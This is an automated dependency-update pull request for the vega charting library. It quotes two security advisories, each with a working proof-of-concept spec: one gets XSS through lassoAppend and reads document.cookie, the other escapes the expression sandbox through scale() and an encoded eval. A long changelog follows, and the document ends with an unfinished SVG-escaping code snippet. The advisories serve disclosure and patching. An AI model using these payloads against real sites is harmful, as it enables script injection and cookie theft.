
Update dependency vega to v5.23.0 [SECURITY] #78

Open: wants to merge 1 commit into base: main


renovate[bot] (Contributor) commented Mar 24, 2023

Mend Renovate

This PR contains the following updates:

Package | Change
vega | 5.6.0 -> 5.23.0

GitHub Vulnerability Alerts

CVE-2023-26487

Summary

Vega's lassoAppend function: lassoAppend accepts 3 arguments and internally invokes the push function on the 1st argument, passing an array consisting of the 2nd and 3rd arguments as the push call argument. The type of the 1st argument is supposed to be an array, but it's not enforced.

This makes it possible to specify any object with a push function as the 1st argument; the push function can be set to any function that can be accessed via event.view (not all such functions can be exploited due to invalid context or signature, but some can, e.g. console.log).

Details

The issue is that lassoAppend doesn't enforce proper types of its arguments:

.....
export function lassoAppend(lasso, x, y, minDist = 5) {
    const last = lasso[lasso.length - 1];

    // Add point to lasso if distance to last point exceeds minDist or it's the first point
    if (last === undefined || Math.sqrt(((last[0] - x) ** 2) + ((last[1] - y) ** 2)) > minDist) {
        lasso.push([x, y]);
.....

PoC

Use the following Vega snippet (it depends on the browser's non-built-in event.view.setImmediate function; feel free to replace it with event.view.console.log or similar and observe the result in the browser's console)

{
  "$schema": "https://vega.github.io/schema/vega/v5.json",
  "width": 350,
  "height": 350,
  "autosize": "none",
  "description": "Toggle Button",
  "signals": [
    {
      "name": "toggle",
      "value": false,
      "on": [
        {
          "events": {"type": "click", "markname": "circle"},
          "update": "toggle ? false : true"
        }
      ]
    },
    {
      "name": "addFilter",
      "on": [
        {
          "events": {"type": "mousemove", "source": "window"},
          "update": "lassoAppend({'push':event.view.setImmediate},'alert(document.domain)','alert(document.cookie)')"
        }
      ]
    }
  ],
  "marks": [
    {
      "name": "circle",
      "type": "symbol",
      "zindex": 1,
      "encode": {
        "enter": {
          "y": {"signal": "height/2"},
          "angle": {"value": 0},
          "size": {"value": 400},
          "shape": {"value": "circle"},
          "fill": {"value": "white"},
          "stroke": {"value": "white"},
          "strokeWidth": {"value": 2},
          "cursor": {"value": "pointer"},
          "tooltip": {"signal": "{Tip: 'Click to fire XSS'}"}
        },
        "update": {"x": {"signal": "toggle === true ? 190 : 165"}}
      }
    },
    {
      "name": "rectangle",
      "type": "rect",
      "zindex": 0,
      "encode": {
        "enter": {
          "x": {"value": 152},
          "y": {"value": 162.5},
          "width": {"value": 50},
          "height": {"value": 25},
          "cornerRadius": {"value": 20}
        },
        "update": {
          "fill": {"signal": "toggle === true ? '#006BB4' : '#939597'"}
        }
      }
    }
  ]
}

Impact

This issue opens various XSS vectors, but exact impact and severity depends on the environment (e.g. Core JS setImmediate polyfill basically allows eval-like functionality).

CVE-2023-26486

Summary

The Vega scale expression function has the ability to call arbitrary functions with a single controlled argument. This can be exploited to escape the Vega expression sandbox in order to execute arbitrary JavaScript.

Details

The scale expression function passes a user supplied argument group to getScale, which is then used as if it were an internal context. The context.scales[name].value is accessed from group and called as a function back in scale.

PoC

The following Vega definition can be used to demonstrate this issue by executing the JavaScript code alert(1);

{
  "$schema": "https://vega.github.io/schema/vega/v5.json",
  "data": [
    {
      "name": "XSS PoC",
      "values": [1],
      "transform": [
        {
          "type": "formula",
          "as": "amount",
          "expr": "scale('func', null,  {context: {scales: {func: {value: scale('func', 'eval(atob(\"YWxlcnQoMSk7\"))', {context: {scales: {func: {value: [].constructor.constructor}}}})}}}})"
        }
      ]
    }
  ]
}

This can be viewed in the Vega online IDE at https://vega.github.io/editor/#/url/vega/N4IgJAzgxgFgpgWwIYgFwhgF0wBwqgegIDc4BzJAOjIEtMYBXAI0poHsDp5kTykSArJQBWENgDsQAGhAATJJhSoA2qHFIEcNCAAaAZT0ACAApsAwtJDEkAGwZwIaZQEYAujMwAnJOIgAzNk8EJ1BMAE8cLXQAoIYbFBkkR3QNNgZxTEs4AA8cT21oWzgACgByP3SoUqlDcTibGsNgKAlMHMxUJsKbB07gCvEoPus7OE7ukvLK6sNSuBHihTYmYoAdEABNAHVsmyhxAEU2AFk9AGsAdnWASmuZ5tb2von8JoGhppH7TuVXShbfF4GFBMIF-hIIECQYEAL5wmHXeEIkAw1yomFAA


Release Notes

vega/vega (vega)

v5.23.0

Compare Source

Changes from v5.22.1:

This version contains dependency updates, bug fixes, and security patches, plus a few extra utilities to aid Vega-Lite.

monorepo

  • Update dependencies, including D3 packages.
  • Update rollup config to use .mjs extensions.

vega-canvas

  • Update rollup config.

vega-crossfilter

  • Update rollup config.

vega-dataflow

  • Update rollup config.

vega-encode

  • Update rollup config.

vega-event-selector

  • Update rollup config.

vega-expression

  • Update rollup config.

vega-force

  • Update rollup config.

vega-format

  • Update rollup config.

vega-functions

vega-geo

  • Update rollup config.

vega-hierarchy

  • Update rollup config.

vega-interpreter

  • Update rollup config.

vega-label

vega-loader

  • Update rollup config.

vega-parser

vega-projection

  • Register projections as recognized Vega scales.
  • Update rollup config.

vega-projection-extended

  • Update rollup config.

vega-regression

  • Update rollup config.

vega-runtime

  • Update rollup config.

vega-scale

  • Add registerScale() and isRegisteredScale() methods. (Thanks @hydrosquall!)
  • Register scales as recognized Vega scales.
  • Update rollup config.

vega-scenegraph

  • Update test cases to match dependency updates.
  • Update rollup config.

vega-schema

  • Make __count__ private from schema, #3659 (Thanks @lsh!)
  • Update rollup config.

vega-selections

  • Update rollup config.

vega-statistics

  • Update rollup config.

vega-time

  • Update rollup config.

vega-transforms

  • Update rollup config.

vega-typings

vega-util

  • Update typescript config.
  • Update rollup config.

vega-view

  • Wrap querySelectorAll in Array.from, #3639 (Thanks @ravron!)
  • Update rollup config.

vega-view-transforms

  • Update rollup config.
  • Fix autosize="fit-x/y" when legend is larger than plot, #3474 (Thanks @stas-sl!)

vega-voronoi

  • Update rollup config.

vega-wordcloud

  • Update rollup config.

vega-cli

  • Update rimraf version, adjust code in response.
  • Update rollup config.

vega

  • Update test scenes to match dependency updates.
  • Update rollup config.

v5.22.1

Compare Source

Changes from v5.22.0:

monorepo

  • Update dependencies.

vega-scenegraph

  • Fix SVG path parser null check. (#3451).

v5.22.0

Compare Source

Changes from v5.21.0:

docs

  • Add Packed Bubble Chart example. (thanks @PBI-David!)
  • Improve TimeUnit transform documentation.

monorepo

  • Update dependencies, including D3 ESM packages.
  • Update rollup config to bundle ESM packages for CJS use.
  • Update tests to match new dependencies.
  • Bump minor version numbers for all affected modules.

vega-functions

  • Add lasso selection expression functions. (thanks @dvmoritzschoefl!)
  • Suppress unsupported expression function arguments.

vega-label

  • Fix to not assume that a label always has some part inside the chart's bounding box. (thanks @chanwutk!)

vega-scenegraph

  • Fix SVG path close logic. (#3377)
  • Fix SVG renderer dirty check. (#3411).
  • Fix SVG path string parser, update tests. (#3432)
  • Fix SVG mix-blend-mode to use style attribute. (#3435)

vega-selections

  • Optimize selection functions for ID-only stores. (thanks @arvind!)

vega-transforms

  • Fix TimeUnit transform updates.

vega-typings

  • Limit type linting to local TypeScript version only. (thanks @domoritz!)
  • Adjust EventListenerHandler typings. (#3390)

v5.21.0

Compare Source

Changes from v5.20.2:

monorepo

  • Update dependencies.

vega

  • Update test scenegraphs.

vega-event-selector

  • (Breaking) Change exported method name.

vega-expression

  • (Breaking) Change exported method names.

vega-label

  • Add support for infinite padding, no bounds on label layout. (#3252)

vega-loader

  • Fix loader so that baseURL is not prepended to data: URLs. (#3195)
  • Minor refactoring.

vega-parser

  • Update dependencies.

vega-runtime

  • Dead code elimination for runtime expression instantiation.
  • Minor refactoring.

vega-statistics

  • Fix sampleCurve utility to properly scale values in angle subdivision test. (#3173)

vega-typings

vega-util

  • Allow customization of logger handler. (thanks @challet!)

v5.20.2

Compare Source

Changes from v5.20.1:

vega-view

  • Fix container initialization bug.

v5.20.1

Compare Source

Changes from v5.20.0:

monorepo

  • Update dependencies.

vega-dataflow

vega-transforms

vega-typings

  • Update typing comments for bindings and projections to fill-in missing Vega-Lite documentation.

v5.20.0

Compare Source

Changes from v5.19.1:

monorepo

  • Update CI configuration. (thanks @domoritz!)
  • Update build configuration. (thanks @domoritz!)
  • Update dependencies.

vega

  • Add web test for external element binding.

vega-scenegraph

  • Add early exit for image rendering with zero width or height.

vega-schema

  • Add signal binding to external input element.

vega-typings

  • Add signal binding to external input element.

vega-util

  • Update inherit utility to use defineProperty, avoids upsetting configurations that ban assignment overrides of Object prototype properties. (#3109, thanks @erights!)

vega-view

  • Add signal binding to external input element.

v5.19.1

Compare Source

Changes from v5.19.0:

vega-schema

  • Fix schema generator for data transforms.

v5.19.0

Compare Source

Changes from v5.18.0:

vega-functions

  • Add pluck expression function. (thanks @arvind!)
  • Add additional Vega-Lite selection helper methods. (thanks @arvind!)

vega-parser

  • Fix signal check for data source values property. (thanks @domoritz!)

vega-scenegraph

vega-schema

vega-selections

  • Add additional Vega-Lite selection helper methods. (thanks @arvind!)

v5.18.0

Compare Source

Changes from v5.17.3:

vega

vega-functions

  • Update vega-selections dependency.

vega-selections

  • Add Vega-Lite v5 "point" selection support. (thanks @arvind!)

v5.17.3

Compare Source

Changes from v5.17.2:

vega-expression

  • Remove unsafe replace function. (#3027)

vega-functions

  • Add replace function with input type check. (#3027)

vega-parser

  • Update dependencies.

vega-view

  • Update dependencies.

v5.17.2

Compare Source

Changes from v5.17.1:

vega-expression

  • Remove unsafe sequence functions. (#3027)

vega-functions

  • Add sequence functions with input type checks. (#3027)

vega-parser

  • Update dependencies.

vega-schema

vega-selections

  • Update dependencies.

vega-view

  • Update dependencies.

v5.17.1

Compare Source

Changes from v5.17.0:

vega-geo

vega-expression

  • Fix XSS vulnerability in expression parser and code generator. (#3018)

vega-typings

  • Remove incorrect comment for Interpolate type.

v5.17.0

Compare Source

Changes from v5.16.1:

vega-canvas

  • Fix browser index route for ES modules. (#2907)

vega-loader

  • Add iterable support to JSON loader. Iterable inputs are expanded to arrays, then ingested.
  • Fix browser index route for ES modules. (#2907)

vega-util

  • Add isIterable utility.

v5.16.1

Compare Source

Changes from v5.16.0:

monorepo

  • Fix rollup config to use umd rather than iife bundles. (#2896)

v5.16.0

Compare Source

Notable Changes
  • The new label transform automatically positions labels without overlapping other marks. (Thanks @chanwutk!)
  • Completes the transition to using vega-datasets 2.0+, including swapping out the Iris dataset for a more adorable Penguins dataset. 🐧
  • Major update of build system to use a centralized rollup configuration. (Thanks @domoritz!)
Changelog

Changes from v5.15.0:

docs

monorepo

  • Complete transition to vega-datasets 2.0.
  • Use centralized rollup config. (thanks @domoritz!)

vega

  • Use centralized rollup config. (thanks @domoritz!)
  • Update and extend test specifications.

vega-canvas

vega-crossfilter

vega-dataflow

vega-encode

vega-event-selector

vega-expression

  • Use forbidden / allowed, remove blacklist / whitelist (Breaking change)
  • Fix use of var, prefer const and let. (thanks @lgrammel!)
  • Use centralized rollup config. (thanks @domoritz!)

vega-functions

vega-force

vega-format

vega-geo

vega-hierarchy

vega-interpreter

vega-label

  • 1.0.0 release, now integrated into Vega! (thanks @chanwutk!)
  • Fix use of var, prefer const and let. (thanks @lgrammel!)
  • Use centralized rollup config. (thanks @domoritz!)

vega-loader

vega-parser

vega-projection

vega-projection-extended

vega-regression

vega-runtime

vega-scale

vega-scenegraph

vega-schema

vega-selections

vega-statistics

vega-time

vega-transforms

vega-typings

vega-util

vega-view-transforms

vega-view

vega-voronoi

vega-wordcloud

v5.15.0

Compare Source

Changes from v5.14.0:

monorepo

  • Update dependencies, including use of D3 v6 packages.
  • Refactor all packages for JavaScript modernization. (thanks @domoritz & @lgrammel!)

vega

  • Update vega-core build to use D3 v6.

vega-scale

v5.14.0

Compare Source

Notable Changes
  • Update SVG rendering to produce fully compliant XML. (#2672)
  • Major refactoring of the Vega code to be more lean and modern. The main changes are:
    • Use shorthand property method syntax (e.g., rather than assignment to prototype objects).
    • Use arrow functions rather than function declarations where appropriate.
    • Prefer use of let and const to var.
  • Upgrade the documentation examples to use vega-datasets 2.0+, including swapping out the Iris dataset for a more adorable Penguins dataset. 🐧
  • Various bug fixes, documented below.
Changelog

Changes from v5.13.0:

vega-cli

  • Update SVG test output.

vega-canvas

  • Update to use leaner syntax.

vega-crossfilter

  • Update to use leaner syntax.

vega-dataflow

  • Fix EventStream to support detach method. (#2753)
  • Fix Pulse addAll to clear rem set when applicable. This prevents tuple removal from being invoked on newly instantiated operators that never observed those tuples in the first place. (#2605)
  • Update to use leaner syntax.

vega-encode

  • Update to use leaner syntax.

vega-event-selector

  • Update to use leaner syntax.

vega-expression

  • Update to use leaner syntax.

vega-force

  • Update to use leaner syntax.

vega-format

  • Update to use leaner syntax.

vega-functions

  • Update to use leaner syntax.

vega-geo

  • Update to use leaner syntax.

vega-hierarchy

  • Update to use leaner syntax.

vega-label

  • Update to use leaner syntax.

vega-loader

  • Update to use leaner syntax.

vega-parser

  • Fix production rule support for guides. (#2754)
  • Update to use leaner syntax.

vega-projection

  • Update to use leaner syntax.

vega-regression

  • Update to use leaner syntax.

vega-scale

  • Update to use leaner syntax.

vega-scenegraph

  • Add markup and serializeXML utilities for SVG string output. Ensure proper XML output. (#2672)
  • Fix leaky SVG scaleX/Y transforms on non-path marks. (#2738)
  • Fix bounds calculation for rotated paths. (#2780)
  • Fix canvas picking for clipped groups with corner radius and no fill. (#2797)
  • Fix SVG path parsing: support concatenated decimals and implicit lineTo commands. (#2803)
  • Update tests, add xmllint checks to test conformance of SVG output.
  • Update to use leaner syntax.
  • Internal Breaking Change: Update SVGStringRenderer class methods to use markup utility.
  • Internal Breaking Change: Drop openTag, closeTag utilities.

vega-statistics

  • Update to use leaner syntax.

vega-time

  • Update to use leaner syntax.

vega-transforms

  • Update to use leaner syntax.

vega-view-transforms

  • Update to use leaner syntax.

vega-view

  • Update to use leaner syntax.

vega-util

  • Add members argument to inherits utility.
  • Add ascending comparator utility.
  • Update to use leaner syntax.

vega-voronoi

  • Update to use leaner syntax.

vega-wordcloud

  • Update to use leaner syntax.

v5.13.0

Compare Source

Notable Changes
  • Improved Streaming Performance.

    For performance, Vega caches a lot of internal data structures, including calculated tuples, scenegraph items, and SVG DOM nodes. Previously, nested scopes (such as those created for facetted data) that result in vega-runtime subcontexts were never cleaned. If no external View API calls are made, this is fine, and actually improves performance for interaction-driven dynamic filtering. However, when providing streaming data to Vega through the View API, uncleaned caches and subcontexts can result in substantial memory leaks that also eventually degrade performance.

    This version adds mechanisms for clearing caches and detaching subflows to support streaming data within nested specifications. When input data is removed via a View API call or via signal-valued URL, Vega will now by default trigger garbage collection to reclaim resources. This behavior can be disabled by calling clean(false) on a constructed ChangeSet passed to the View API.

  • Improved Cursor Performance.

    Previously Vega updated the cursor style on the HTML document body. This persists cursor settings even during interactions (such as drags) that may leave the Vega View component. However, it also can result in large performance penalties in Chrome, which re-evaluates CSS styles in response. This version changes the default behavior to set the cursor locally on the Vega View component. If a global cursor is desired, the boolean config property events.globalCursor can be set true or the View method globalCursor can be invoked to change the setting at runtime.

  • Optional Expression Interpreter.

    This release adds interpreter support for Vega expressions that is Content Security Policy (CSP) compliant. By default, the Vega parser performs code generation for parsed Vega expressions, and the Vega runtime uses the Function constructor to create JavaScript functions from the generated code. Although the Vega parser includes its own security checks, the runtime generation of functions from source code nevertheless violates security policies designed to prevent cross-site scripting.

    This release provides an interpreter plug-in (the new vega-interpreter package) that evaluates expressions by traversing an Abstract Syntax Tree (AST) for an expression and performing each operation in turn. Use of the interpreter enables compliance with CSP, but can incur a performance penalty. In tests of initial parse and dataflow evaluation times, the interpreter is on average ~10% slower. Interactive updates may incur higher penalties, as they are often more expression-heavy and amortize the one-time cost of Function constructor parsing.

Changelog

Changes from v5.12.3:

vega

  • Update stream.html and stream-nested.html performance test pages.

vega-dataflow

  • Add detach method to Operator to remove adjacent edges (listeners) from the dataflow graph.
  • Add clean setter to ChangeSet, set to true by default if any tuples are removed.
  • Add clean getter/setter to Pulse, propagate value to forked pulses if they share a data source.
  • Update logging calls during Dataflow evaluation.

vega-encode

  • Update DataJoin transform to clean internal map when pulse.clean() is true.
  • Update Scale to include domainMid as an extrema if it exceeds the domain min or max. (#2656)

vega-functions

  • Fix scale function to not special case undefined input. This ensures identical semantics with the internal _scale helper function used by code-generated encoders.

vega-geo

  • Update d3-geo dependency.

vega-interpreter

  • Add new vega-interpreter package.

vega-projection

  • Update d3-geo dependency.

vega-projection-extended

  • Update vega-projection dependency.

vega-runtime

  • Add runtime detach method to remove subcontexts. Export as detachSubflow on the head operator of a generated subflow.
  • Add pluggable expression evaluators.

vega-statistics

  • Fix numbers utility to exclude empty string.

vega-transforms

  • Update Aggregate transform to clean internal map when pulse.clean() is true.
  • Update Facet, PreFacet, and Subflow transforms to prune subflows in response to pulse.clean().
  • Update Load transform to set pulse.clean(true) when removing loaded data.
  • Fix Bin and Extent to treat empty string as a missing value. (thanks @domoritz!)
  • Fix aggregate ops to treat empty string as a missing value.

vega-typings

  • Add eventConfig.globalCursor to config typings.
  • Add dataflow logger to typings.
  • Add parse options to typings.

vega-util

  • Refactor code for fastmap and visitArray utilities.

vega-view

  • Add View constructor option expr to pass in a custom expression evaluator.
  • Add globalCursor method and event configuration.
  • Update to make the Vega view container the default cursor target.

v5.12.3

Compare Source

Notable Changes

The previous Vega v5.12.0 release introduced changes to how SVG was generated, including the addition of an internal stylesheet. However, this leads to integration issues with downstream tools (including at least one popular SVG optimizer) that do not support stylesheet parsing. In addition, local performance tests indicate faster rendering in Chrome when using presentation attributes instead of CSS styling. This version (v5.12.3) now changes the SVG output to favor presentation attributes (fill="blue") over CSS style (style="fill: blue;").

CSS styles have been removed in all but one case: the use of image-rendering for non-smoothed images, where browser differences require multiple style definitions to appease both Chrome and Firefox, something we can't express with presentation attributes alone. If and when Firefox properly supports image-rendering: pixelated we can consider dropping this last use of CSS.

Note that external stylesheets can still be used to style Vega SVG content, and may now have higher specificity due to the use of attributes.

Changelog

Changes from v5.12.2:

monorepo

  • Update eslint config to flag trailing commas.

vega

  • Add initialization timing to test spec viewer page.
  • Remove dangling commas.
  • Update dev dependencies.

vega-cli

  • Update SVG test cases.

vega-format

  • Remove dangling commas.

vega-geo

  • Remove dangling commas.

vega-hierarchy

  • Remove dangling commas.

vega-parser

  • Fix trailing function argument commas in axis utils. (#2645, thanks @armanozak!)
  • Remove dangling commas.

vega-projections-extended

  • Update dev dependencies.

vega-scenegraph

  • Favor SVG presentation attributes over CSS style. (#2640)
  • Fix clipped group picking for canvas. (#2600)
  • Remove dangling commas, other code clean-up.

vega-schema

  • Remove dangling commas.

vega-time

  • Remove dangling commas.

vega-transforms

  • Remove dangling commas.

v5.12.2

Compare Source

Changes from v5.12.1:

vega-scenegraph

  • Add canvas handler event listeners necessary for state management. Fixes a regression introduced in v5.12.1. (#2641)

vega-typings

  • Fix typings for locale specification and View API. (thanks @haldenl!)

v5.12.1

Compare Source

Changes from v5.12.0:

monorepo

  • Switch from Travis CI to GitHub Actions. (thanks @domoritz!)

vega-cli

  • Add tests for vega-cli.

vega-parser

  • Update code style for config constants.

vega-scenegraph

  • Add class to svg root group, localize SVG stylesheet to that class. (#2618)
  • Lazily register CanvasHandler event listeners. By avoiding unneeded listeners, this change avoids a number of passive listener violation warnings. (#2621)

vega-transforms

  • Fix regression of string to number conversion in aggregate sum op. (thanks @haldenl!)

vega-typings

  • Update View typings.
  • Fix missing color schemes in typings. (thanks @domortiz!)

vega-view

  • Code clean up.

v5.12.0

Compare Source

Notable Additions
  • View-specific locale management for number and date formatting. The View constructor accepts a locale option, and Vega specs support a config.locale property. Locale objects should have number and/or time properties that map to valid d3-format or d3-time-format locale definitions.
  • View toCanvas now accepts an externalContext option to draw into a separately managed canvas instance. For example, one could draw multiple Vega views into the same node-canvas instance for server-side PDF document generation.
  • Initial support for signal-valued axis orient properties. This addition allows the position of an axis (e.g., left versus right) to be dynamically updated at runtime. The feature should be considered experimental; subtle bugs may still arise.
  • Internal refactoring to support content security policy (CSP) in the future. The Vega parser accepts an ast option flag to include generated abstract syntax trees for expressions in the parser output. All Function constructor use for generated code is now consolidated into a single file in the vega-runtime package and could be overridden if an expression AST interpreter is implemented.
  • Bug fixes! See below...
Changelog

Changes from v5.11.1:

vega

  • Update bar-time test specification to test locale config usage.
  • Update budget-forecasts test specification.
  • Update to use refactored runtime context.

vega-cli

  • Update to use locale view constructor option.

vega-dataflow

  • Add locale property to set a dataflow-specific locale for number and date formatting.

vega-encode

  • Update to use centralized locale management. Transforms now access the dataflow-specific locale via the input pulse.

vega-expression

  • Fix handling of this global variable.

vega-format

  • New package for format methods that centralizes locale management.

vega-functions

  • Add centralized locale management. Format functions now access the dataflow-specific locale via the runtime context object, available to expression functions via the this context.
  • Add and export expression parser, support AST export option.
  • Add internal scale functions for use by encoders.
  • Fix scale dependencies: non-literal scale references should depend on all scales.

vega-geo

  • Fix contour, density2D size setter input checks.

vega-loader

  • Add UTC parser parameter to read method.
  • Use the default locale when custom time format parsers are not provided.

vega-parser

  • Internal breaking change: Output runtime specification has changed the encoding of parsed expression functions. Generated code is now wrapped in an object and stored in the code property.
  • Internal breaking change: Generated expression code no longer includes method variable definitions or additional logic. These have been moved to vega-runtime.
  • Add signal support for axis translate property. (Thanks @haldenl!)
  • Add experimental signal support for axis orient property. (Thanks @haldenl!)
  • Add parsing of locale config, include in runtime spec output.
  • Add options argument to parse.
  • Add boolean ast parse option to enable AST output from expression parser.
  • Refactor to use expression parser for synthesized encoder logic.
  • Fix circular dependencies.

vega-runtime

  • Internal breaking change: The runtime now assumes the updated vega-parser output format. All code generation beyond standard expression parser output has now been consolidated into the runtime parsing process.
  • Propagate locale config to runtime context object.
  • Refactor code, add optimized code generation for accessors and comparators.
  • Refactor all non-standard code generation to the runtime context.
  • Fix circular dependencies.

vega-scale

  • Internal breaking change: Update to use centralized locale management. Formatting methods now require a locale parameter as the first argument.
  • Fix valid tick method to sort ticks based on scale range values. (#2579)

vega-scenegraph

  • Add externalContext CanvasRenderer option. (Thanks @pixelspark!)
  • Add resetSVGDefIds to reset gradient and clip id counter. (Thanks @kanitw!)
  • Add SVG style block, set default fill and miter limit values. (#2498)
  • Update SVG test outputs.
  • Update to use centralized locale management. The ARIA caption generators access the dataflow-specific locale via the runtime context object.
  • Update reference to axis orient.
  • Fix SVG radial gradient pattern fill to use style, not fill attribute.
  • Fix ampersand escape in SVG attributes. (#2608)
  • Fix CSS fill inherit for tspan.

vega-schema

  • Add axis translate signal support to schema.
  • Add signal-valued axis orient to schema.

vega-time

  • Internal breaking change: Remove formatting methods, which are now part of vega-format.

vega-transforms

  • Update aggregation ops to no longer use the Function constructor.
  • Update dependencies.

vega-typings

  • Add externalCanvas render option to typings.
  • Add axis translate signal support to typings.
  • Add signal-valued axis orient to typings.

vega-util

  • Update field, key, and compare methods to no longer use the Function constructor.
  • Add optional arguments to inject optimized code generators for accessors and comparators.

vega-view

  • Add locale input options and config handling.
  • Update to use refactored runtime context.

vega-view-transforms

  • Add signal support for axis translate property.
  • Update reference to axis orient.
  • Fix ViewLayout reflow to ensure group bounds are updated. (#2568)
  • Fix grid layout calculations with empty grid input. (#2541)

vega-wordcloud

  • Update dependencies.

v5.11.1

Compare Source

Changes from v5.11.0:

monorepo

  • Update dev dependencies.

vega-hierarchy

  • Update tests for tape 5.0.

vega-scenegraph

  • Use single quotes for generated aria-label captions. (Thanks @sprmn!)
  • Escape double quotes in SVG attributes, add test case.

vega-statistics

  • Update tests for tape 5.0.

vega-view-transforms

  • Update tests for tape 5.0.

v5.11.0

Compare Source

Notable Additions
  • Preliminary support for ARIA accessibility attributes in SVG output. Mark and guide definitions now include automatically-generated roles and labels, which can be customized using description and aria properties. Individual mark items do not include ARIA attributes by default (which helps prevent bloat of both the scenegraph and output SVG), but these can be added using description and aria encoding channels.
  • Improve generated HTML form elements for signal bindings. Deployments that use custom CSS for styling bound elements may wish to make minor adjustments.
  • dayofyear time unit support for the timeunit transform.
  • dayofyear, week, utcdayofyear, and utcweek expression functions.
  • Axis domainCap, gridCap, and tickCap properties.
Changelog

Changes from v5.10.1:

monorepo

  • Add ARIA attribute generation documentation.
  • Update eslint setup, consolidate configuration.
  • Update dev dependencies.

vega

  • Add calendar test specification.
  • Add overview-detail-bins test spec to test suite.
  • Update crossfilter test scenes to include description property output.

vega-encode

  • Move internal tick, label utilities to vega-scale.
  • Fix valid tick check calculation. (#2531)

vega-functions

  • Add dayofyear, week, utcdayofyear, utcweek expression functions.

vega-geo

  • Fix density utility size input checking bug.

vega-parser

  • Add ARIA attribute generation for marks and guides via aria and description properties.
  • Add backing scale names to axis, legend datum objects.
  • Add zindex support for guide config.
  • Add axis domainCap, gridCap, and tickCap properties. (Thanks @kanitw!)

vega-scale

  • Add tick, label guide utilities from vega-encode.
  • Add domainCaption utility.
  • Fix overflow with large domain and small tickMinStep (#2550, thanks @rwoollen!)

vega-scenegraph

  • Add ARIA attribute generation to SVG renderers:
    • Parent <g> tags for mark items include automatic role and aria-roleDescription attributes.
    • Parent <g> tags for axes and legends include automatic aria-label captions.
    • Attribute generation for mark and guide definitions can be customized using the aria and description properties. If aria is false, the content is hidden from the accessibility tree by setting aria-hidden SVG attribute. The description property determines the aria-label SVG attribute.
    • Individual mark items do not include ARIA attributes by default, but these can be added using the encoding channels aria and description. If a description is provided and aria !== false, then Vega will generate accompanying role and aria-roledescription attributes for a mark item.
  • Provide experimental ariaRole and ariaRoleDescription encoding channels for individual marks, which override the default role and aria-roledescription attributes generated by Vega. However, note that these are experimental features and so may change at a later date.

vega-schema

  • Add ARIA accessibility properties to mark, guide, and encode schemas.
  • Add axis domainCap, gridCap, and tickCap properties.

vega-time

  • Add dayofyear time unit support and corresponding tests.
  • Add dayofyear, week, utcdayofyear, utcweek utility functions.
  • Add export for TIME_UNITS array of valid time unit strings.

vega-transforms

  • Update TimeUnit transform parameter schema to enforce valid time unit strings.

vega-typings

  • Add ARIA accessibility properties to mark, guide, and encode typings.
  • Add dayofyear option to TimeUnit transform typings.
  • Add zindex support for guide config.
  • Add axis domainCap, gridCap, and tickCap properties.

vega-view

  • Improved semantic HTML for generated signal bindings to form input elements.

v5.10.1

Compare Source

Changes from v5.10.0:

vega-encode

  • Update default guide label format to support multi-line arrays. (#2456)

vega-loader

  • Use startsWith rather than indexOf for string prefix checks.

vega-parser

  • Use startsWith rather than indexOf for string prefix checks.
  • Set default fill and size for trail mark config.

vega-transforms

  • Fix window operator init state for prev_value and next_value. (#2475)

vega-typings

  • Update mark config for arc mark.

vega-view-transforms

  • Fix Overlap transform to early exit when there are no items (#​2449).

v5.10.0

Compare Source

Notable Additions
  • The Vega parser now generates a built-in background signal which the view uses to set the background color. While not technically a breaking change (specs will still parse and evaluate successfully), existing specs that use a signal named "background" may not render the same as before, in which case a different signal name should be used.
  • Top-level properties (autosize, background, padding, width, height) accept signal references, such as {"signal": "<expr>"}, which map to a signal definition's update property. If the top-level signals array contains an entry that matches one of these properties, the definitions will be merged, with precedence given to the properties defined in the signals array.
  • Vega views now include ARIA attributes on the view container DOM element. The role attribute is set to "figure", and the aria-label attribute is set to the specification description property.
  • The aggregate and window transforms support the product operation to multiply values.
  • The config supports a top-level lineBreak option for setting a global default for text line breaks. This property should be a string or regexp value, or a corresponding signal reference.
  • Support for text baseline values line-top and line-bottom. These values are similar to top and bottom baselines, but calculated relative to the lineHeight rather than fontSize alone.
  • Support for color blend modes via the new blend encoding channel. The allowed values are: multiply, screen, overlay, darken, lighten, color-dodge, color-burn, hard-light, soft-light, difference, exclusion, hue, saturation, color, luminosity. For Canvas rendering, the blend is set via the context 2D globalCompositeOperation property. For SVG rendering, the blend is set via the CSS mix-blend-mode style. The default Vega value is null (or undefined), which maps to the default values "source-over" (for Canvas) and "normal" (for SVG). For more, see the Canvas globalCompositeOperation and CSS mix-blend-mode documentation, including limitations in cross-browser support.
  • Support for configuration of cross-origin image handling. Vega uses crossOrigin="anonymous" by default for loaded images, which allows images loaded from a different host to be included in exported visualization images (and thereby avoid "tainted canvas errors"), so long as the server provides permission via proper CORS headers. This default can be overridden by providing loader options to the Vega view that include a crossOrigin property. If this property is defined and maps to a value of null or undefined, then a no-cors fetch will be performed instead.
  • Add axis labelOffset property to adjust axis label position in addition to tickOffset, and labelLineHeight to set the l

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


  • If you want to rebase/retry this PR, check this box

This PR has been generated by Mend Renovate. View repository job log here.
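Two of the scenegraph items in the changelog above (v5.11.1, "Escape double quotes in SVG attributes", and v5.11.0, generating aria-label captions from the description property) rest on one rule: any author- or data-controlled text written into an SVG attribute must be escaped, because a raw `"` ends a double-quoted attribute value early. The block below is an added illustration of that rule and is not vega-scenegraph's code; the function names escapeAttr, svgGroupOpen and countRawQuotes, and the exact set of attributes emitted, are this example's own assumptions.

```javascript
// Added example (not vega-scenegraph code): build an ARIA-annotated <g> wrapper of
// the kind the release notes describe, escaping every value that lands in an
// attribute. Names such as escapeAttr and svgGroupOpen are this example's own.

// Escape the characters that can terminate or re-interpret a double-quoted
// SVG/XML attribute value. '&' is replaced first so the entities produced by the
// later replacements are not escaped a second time.
function escapeAttr(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Emit the opening tag of a mark or guide group. `description` is author- or
// data-controlled text that becomes aria-label; `aria === false` hides the group
// from the accessibility tree instead, as the v5.11.0 notes describe.
function svgGroupOpen({ role, roleDescription, description, aria = true }) {
  if (aria === false) {
    return '<g aria-hidden="true">';
  }
  const attrs = [
    `role="${escapeAttr(role)}"`,
    `aria-roledescription="${escapeAttr(roleDescription)}"`
  ];
  if (description != null) {
    attrs.push(`aria-label="${escapeAttr(description)}"`);
  }
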